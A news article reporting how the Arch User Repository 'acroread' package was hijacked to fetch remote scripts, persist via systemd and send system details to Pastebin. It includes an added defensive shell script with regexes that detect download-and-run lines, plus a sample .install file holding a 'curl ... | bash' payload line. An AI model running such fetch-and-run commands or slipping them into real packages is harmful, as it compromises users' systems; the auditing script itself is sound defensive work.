Malicious software packages in Linux repositories


Another sign that user-controlled software repositories should not be fully trusted

One of the most popular Linux distros, Arch Linux, has removed up to three packages from its user-controlled repository after it was discovered that they were hosting malicious code, as reported by experts in secure data destruction from the International Institute of Cyber Security.

Arch Linux is a general-purpose, independently developed GNU/Linux distro, predominantly composed of free and open source software, that allows community involvement.

In addition to official repositories such as Arch Build System (ABS), Arch Linux users can also download software packages from other repositories, including the Arch User Repository (AUR), a community-maintained repository created and managed by Arch Linux users.

Since AUR packages are user-developed content, those who maintain Arch always suggest that Linux users carefully review all files, especially the PKGBUILD and any .install file, for malicious code. In any case, it was discovered that the AUR hosted malicious code in various forms, including a PDF reader.

Compromised PDF reader found in Arch User Repository

Last June, a malicious user nicknamed ‘xeactor’ adopted an orphaned package (software without active maintainers) called ‘acroread’, which works as a PDF viewer, and modified it by adding malicious code that would download a script, which in turn would install and run another script from a remote server.

This script installs persistent software that interferes with “systemd” and reconfigures it, and that will run every 360 seconds.
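A review aid for the file check recommended above, as an added example (not code from Arch Linux or the AUR): it flags lines in a PKGBUILD or .install file that download and run remote content or touch systemd, the behaviour described for the modified package. The rule names, the patterns, and the `example-viewer` sample files are constructed for illustration.

```sh
# Added example: heuristic pre-build review of AUR build files (PKGBUILD, *.install).
# A hit means "read this line before running makepkg"; no hits does not prove safety.

# One "tag=ERE" rule per line; names and patterns are this example's own choices.
RULES='fetch-pipe-shell=(curl|wget)[^|;]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|da|z)?sh([[:space:]]|$)
explicit-download=(^|[^[:alnum:]_])(curl|wget)[[:space:]]
systemd-change=systemctl[[:space:]]|systemd/system|\.(timer|service)([^[:alnum:]]|$)'

# audit_build_file FILE: prints "[tag] FILE:LINE:text" per hit; returns 1 if any hit.
audit_build_file() {
  _status=0
  while IFS= read -r _rule; do
    _tag=${_rule%%=*}
    _regex=${_rule#*=}
    # -n keeps real line numbers; the second grep drops pure comment lines.
    _out=$(grep -nE -e "$_regex" -- "$1" | grep -vE '^[0-9]+:[[:space:]]*#') || continue
    _status=1
    printf '%s\n' "$_out" | while IFS= read -r _hit; do
      printf '[%s] %s:%s\n' "$_tag" "$1" "$_hit"
    done
  done <<EOF
$RULES
EOF
  return "$_status"
}

# write_sample DIR: creates constructed (not real) build files for the demo.
write_sample() {
  cat >"$1/PKGBUILD" <<'EOF'
pkgname=example-viewer
source=("https://example.invalid/example-viewer-1.0.tar.gz")
install=example-viewer.install
package() {
  # curl is only named in this comment
  install -Dm755 viewer "$pkgdir/usr/bin/viewer"
}
EOF
  cat >"$1/example-viewer.install" <<'EOF'
post_install() {
  curl -s https://example.invalid/stage1 | bash
  systemctl enable example-viewer.timer
}
EOF
}

# No arguments: audit the constructed sample. Otherwise audit the given files.
[ "$#" -gt 0 ] || { d=$(mktemp -d); write_sample "$d"; set -- "$d"/*; }
for f in "$@"; do audit_build_file "$f" || true; done
```

In the constructed sample the PKGBUILD itself is clean and every hit comes from the .install file, which is why both files need reading.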

Specialists in secure data destruction claim that the malicious script would be used to collect information from the infected system such as:

  • Date and time
  • Computer ID
  • Package Management Utility Information

The data collected would be published in a Pastebin file.

Fortunately, a code analysis discovered the changes in time and revealed that the scripts did not seem to be a serious threat. Experts in secure data destruction claim that, as soon as it was discovered, the AUR managers reversed the changes made to the package, suspended the ‘xeactor’ account, and also found two more packages that the user had recently adopted and modified.

More malicious software packages

The AUR team also eliminated the other two packages without revealing their names.

If you are an Arch Linux user who downloaded ‘acroread’ recently, we recommend that you remove it as soon as possible.

Even though this flaw is not a serious threat to Linux users, the incident definitely generated a discussion about the security of untrusted software packages.

Linux users are encouraged to remain alert to the use of code developed by unrecognized users.